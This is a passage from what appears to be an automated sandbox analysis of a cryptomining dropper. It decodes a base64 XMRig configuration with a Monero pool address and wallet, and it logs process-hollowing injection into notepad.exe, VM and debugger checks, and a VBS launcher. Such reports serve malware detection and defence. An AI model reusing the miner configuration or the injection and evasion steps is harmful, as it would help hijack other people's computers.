cHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==d5 h (base64 of an XMRig JSON config: pool "xmr-us-east1.nanopool.org:14444", "coin": "monero", "tls": false, "donate-level": 0, "cpu-profile" "threads": 4, the wallet in "user"; the characters after the "==" padding are not part of the blob)
Source: svchost.exe, 0000000B.00000002.468387389.0000023808662000.00000004.00000001.sdmp :: Binary or memory string: "@Hyper-V RAW
Source: P7Oa6i5muL.exe, 00000005.00000002.466131413.0000000001100000.00000004.00000020.sdmp :: Binary or memory string: ew0KCSJhcGkiOiB7DQoJCSJpZCI6IG51bGwsDQoJCSJ3b3JrZXItaWQiOiBudWxsDQoJfSwNCgkiaHR0cCI6IHsNCgkJImVuYWJsZWQiOiBmYWxzZQ0KCX0sDQoJImF1dG9zYXZlIjogZmFsc2UsDQoJInZlcnNpb24iOiAxLA0KCSJiYWNrZ3JvdW5kIjogZmFsc2UsDQoJImNvbG9ycyI6IHRydWUsDQoJInJhbmRvbXgiOiB7DQoJCSJpbml0IjogMSwNCgkJIm51bWEiOiB0cnVlDQoJfSwNCgkiY3B1Ijogew0KCQkiZW5hYmxlZCI6IHRydWUsDQoJCSJodWdlLXBhZ2VzIjogdHJ1ZSwNCgkJImh3LWFlcyI6IG51bGwsDQoJCSJwcmlvcml0eSI6IG51bGwsDQoJCSJtZW1vcnktcG9vbCI6IGZhbHNlLA0KCQkiYXNtIjogdHJ1ZSwNCgkJImFyZ29uMi1pbXBsIjogbnVsbCwNCgkJImNwdS1wcm9maWxlIjogew0KCQkJInRocmVhZHMiOiAyDQoJCX0sDQoJCSJjbi1oZWF2eS8wIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWhlYXZ5L3hodiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1oZWF2eS90dWJlIjogImNwdS1wcm9maWxlIiwNCgkJImNuLWxpdGUvMCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi1saXRlLzEiOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24iOiAiY3B1LXByb2ZpbGUiLA0KCQkiY24vciI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9mYXN0IjogImNwdS1wcm9maWxlIiwNCgkJImNuLWdwdSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJjbi9oYWxmIjogImNwdS1wcm9maWxlIiwNCgkJImNuLzIiOiAiY3B1LXByb2ZpbGUiLA0KCQkiYXJnb24yL2NodWt3YSI6ICJjcHUtcHJvZmlsZSIsDQoJCSJhcmdvbjIvd3JreiI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeCI6ICJjcHUtcHJvZmlsZSIsDQoJCSJyeC8wIjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2xva2kiOiAiY3B1LXByb2ZpbGUiLA0KCQkicngvd293IjogImNwdS1wcm9maWxlIiwNCgkJInJ4L2FycSI6ICJjcHUtcHJvZmlsZSINCgl9LA0KCSJkb25hdGUtbGV2ZWwiOiAwLA0KCSJkb25hdGUtb3Zlci1wcm94eSI6IDAsDQoJImxvZy1maWxlIjogbnVsbCwNCgkicG9vbHMiOiBbDQoJCXsNCgkJCSJhbGdvIjogbnVsbCwNCgkJCSJjb2luIjogIm1vbmVybyIsDQoJCQkidXJsIjogInhtci11cy1lYXN0MS5uYW5vcG9vbC5vcmc6MTQ0NDQiLA0KCQkJInVzZXIiOiAiNDhRYlBaVXRXbThnRzZUNmVnNkg3SkdYYUQ2ZU5KSDhvM1JveUxnQmVxeW03VHh5ZFU5VGZNZlVVZ2FoZXFhN0JGZGh0ZmI5ZDY2NUNnWURqNmY1S3ZkakxlR0ptZFcuV09SS0VSL3BpY2t0dXRvcyIsDQoJCQkicGFzcyI6ICJ4IiwNCgkJCSJyaWctaWQiOiBudWxsLA0KCQkJIm5pY2VoYXNoIjogZmFsc2UsDQoJCQkia2VlcGFsaXZlIjogZmFsc2UsDQoJCQkiZW5hYmxlZCI6IHRydWUsDQoJCQkidGxzIjogZmFsc2UsDQoJCQkidGxzLWZpbmdlcnByaW50IjogbnVsbCwNCgkJCSJkYWVtb24iOiBmYWxzZSwNCgkJCSJzZWxmLXNlbGVjdCI6IG51bGwNCgkJfQ0KCV0sDQoJInByaW50LXRpbWUiOiA2MCwNCgkiaGVhbHRoLXByaW50LXRpbWUiOiA2MCwNCgkicmV0cmllcyI6IDUsDQoJInJldHJ5LXBhdXNlIjogNSwNCgkic3lzbG9nIjogZmFsc2UsDQoJInVzZXItYWdlbnQiOiBudWxsLA0KCSJ3YXRjaCI6IGZhbHNlDQp9AA==v)5 (the same XMRig config with "threads": 2)
Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.219062127.00000172CE340000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.271644731.000001D873140000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.466491261.0000017D02740000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.310120947.00000148E8D40000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.348580078.0000024727000000.00000002.00000001.sdmp :: Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed. (error-message strings from OS libraries; they appear identically in several svchost.exe processes and are not sample logic)
Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmp :: Binary or memory string: vmware
Source: P7Oa6i5muL.exe, 00000005.00000002.465658299.00000000010BA000.00000004.00000020.sdmp :: Binary or memory string: Hyper-V RAWpi
Source: svchost.exe, 00000019.00000002.347799615.00000247260A6000.00000004.00000001.sdmp :: Binary or memory string: Hyper-V RAW0
Source: P7Oa6i5muL.exe, 00000005.00000002.466131413.0000000001100000.00000004.00000020.sdmp, svchost.exe, 0000000B.00000002.468335769.0000023808655000.00000004.00000001.sdmp, svchost.exe, 00000019.00000002.347865649.00000247260EB000.00000004.00000001.sdmp :: Binary or memory string: Hyper-V RAW (the Winsock catalog name of the Hyper-V socket provider in mswsock.dll, present in any process that initialised Winsock)
Source: svchost.exe, 0000000F.00000002.462076297.0000014885E02000.00000004.00000001.sdmp :: Binary or memory string: HvHostWdiSystemHostScDeviceEnumWiaRpctrkwksAudioEndpointBuilderhidservdot3svcDsSvcfhsvcWPDBusEnumsvsvcwlansvcEmbeddedModeirmonSensorServicevmicvssNgcSvcsysmainDevQueryBrokerStorSvcvmickvpexchangevmicshutdownvmicguestinterfacevmicvmsessionNcbServiceNetmanDeviceAssociationServiceTabletInputServicePcaSvcIPxlatCfgSvcCscServiceUmRdpService
Source: P7Oa6i5muL.exe, 00000000.00000002.218256133.0000000002DF1000.00000004.00000001.sdmp :: Binary or memory string: model0Microsoft|VMWare|Virtual (the Win32_ComputerSystem property name followed by a second vendor regex)
Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.219062127.00000172CE340000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.271644731.000001D873140000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.466491261.0000017D02740000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.310120947.00000148E8D40000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.348580078.0000024727000000.00000002.00000001.sdmp :: Binary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.219062127.00000172CE340000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.271644731.000001D873140000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.466491261.0000017D02740000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.310120947.00000148E8D40000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.348580078.0000024727000000.00000002.00000001.sdmp :: Binary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
Source: svchost.exe, 0000000F.00000002.462469594.0000014885E3E000.00000004.00000001.sdmp, svchost.exe, 00000010.00000002.461853027.0000017D01A3E000.00000004.00000001.sdmp, svchost.exe, 00000012.00000002.462448213.0000026677429000.00000004.00000001.sdmp :: Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: P7Oa6i5muL.exe, 00000000.00000002.231068157.0000000007CB0000.00000002.00000001.sdmp, svchost.exe, 00000004.00000002.219062127.00000172CE340000.00000002.00000001.sdmp, svchost.exe, 0000000A.00000002.271644731.000001D873140000.00000002.00000001.sdmp, svchost.exe, 00000010.00000002.466491261.0000017D02740000.00000002.00000001.sdmp, svchost.exe, 00000013.00000002.310120947.00000148E8D40000.00000002.00000001.sdmp, svchost.exe, 00000019.00000002.348580078.0000024727000000.00000002.00000001.sdmp :: Binary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Process information queried: ProcessInformation
Source: C:\Windows\notepad.exe :: Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_004080E0 DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,ProcessIdToSessionId,Process32Next,CloseHandle,FreeLibrary,5_2_004080E0
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_00402E40 mov eax, dword ptr fs:[00000030h] 5_2_00402E40 (reads the PEB pointer from the TEB)
Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe :: Code function: 6_2_035D2E40 mov eax, dword ptr fs:[00000030h] 6_2_035D2E40
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Code function: 5_2_00401800 GetProcessHeap,HeapAlloc,5_2_00401800
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe :: Process token adjusted: Debug
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe :: Memory allocated: page read and write | page guard

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\notepad.exe | Network Connect: 144.217.14.139 108
Source: C:\Windows\notepad.exe | Domain query: xmr-us-east1.nanopool.org
Allocates memory in foreign processes
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory allocated: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: 35D0000 protect: page execute and read and write
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory allocated: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: C20000 protect: page read and write
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory allocated: C:\Windows\notepad.exe base: 400000 protect: page read and write
Creates a thread in another existing process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Thread created: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe EIP: 35D8390
Injects a PE file into a foreign process
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Memory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: 35D0000 value starts with: 4D5A
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Windows\notepad.exe base: 400000 value starts with: 4D5A
Modifies the context of a thread in another process (thread injection)
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Thread register set: target process: 2168
Writes to foreign memory regions
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Memory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 400000
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Memory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 401000
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Memory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 409000
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Memory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 40C000
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Memory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: 5D3000
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Memory written: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe base: C76008
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: 35D0000
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe base: C20000
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Windows\notepad.exe base: 400000
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Windows\notepad.exe base: 401000
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Windows\notepad.exe base: 938000
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Windows\notepad.exe base: A15000
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Memory written: C:\Windows\notepad.exe base: 32E94F2010
Source: C:\Program Files (x86)\oEKXHcMAcoyGDsAvZbduvWYmkwuLXdlUfatRVrQXAjmYBvhKscWCgRJhDvhPpZlMOnCZwSiBBxVnVLWt\jwMZjhPggeDR.exe | Code function: DeleteFileW,CreateToolhelp32Snapshot,LoadLibraryA,GetProcAddress,Process32First,Process32Next,Process32Next,CloseHandle,FreeLibrary, explorer.exe 6_2_035D80E0
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Process created: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe
Source: C:\Users\user\AppData\Local\Temp\P7Oa6i5muL.exe | Process created: C:\Windows\notepad.exe 'C:\Windows\notepad.exe' -c 'C:\ProgramData\LKBNMTFJgl\cfg'
Source: C:\Windows\SysWOW64\cmd.exe | Process created: C:\Windows\SysWOW64\wscript.exe WScript 'C:\ProgramData\LKBNMTFJgl\r.vbs'
Source: P7Oa6i5muL.exe, 00000005.00000002.466253599.0000000001840000.00000002.00000001.sdmp, jwMZjhPggeDR.exe, 00000006.00000000.220278674.00000000018D0000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.462513360.000001DB60D90000.00000002.00000001.sdmp | Binary or memory string: Program Manager
Source: P7Oa6i5muL.exe, 00000005.00000002.466253599.0000000001840000.00000002.00000001.sdmp, jwMZjhPggeDR.exe, 00000006.00000000.220278674.00000000018D0000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.462513360.000001DB60D90000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
Source: P7Oa6i5muL.exe, 00000005.00000002.466253599.0000000001840000.00000002.00000001.sdmp, jwMZjhPggeDR.exe, 00000006.00000000.220278674.00000000018D0000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.462513360.000001DB60D90000.00000002.00000001.sdmp | Binary or memory string: Progman
Source: P7Oa6i5muL.exe, 00000005.00000002.466253599.0000000001840000.00000002.00000001.sdmp, jwMZjhPggeDR.exe, 00000006.00000000.220278674.00000000018D0000.00000002.00000001.sdmp, svchost.exe, 00000011.00000002.462513360.000001DB60D90000.00000002.00000001.sdmp | Binary or memory string: Progmanlock
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Users\user\Desktop\P7Oa6i5muL.exe VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
Source: C:\Users\user\Desktop\P7Oa6i5muL.exe | Queries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
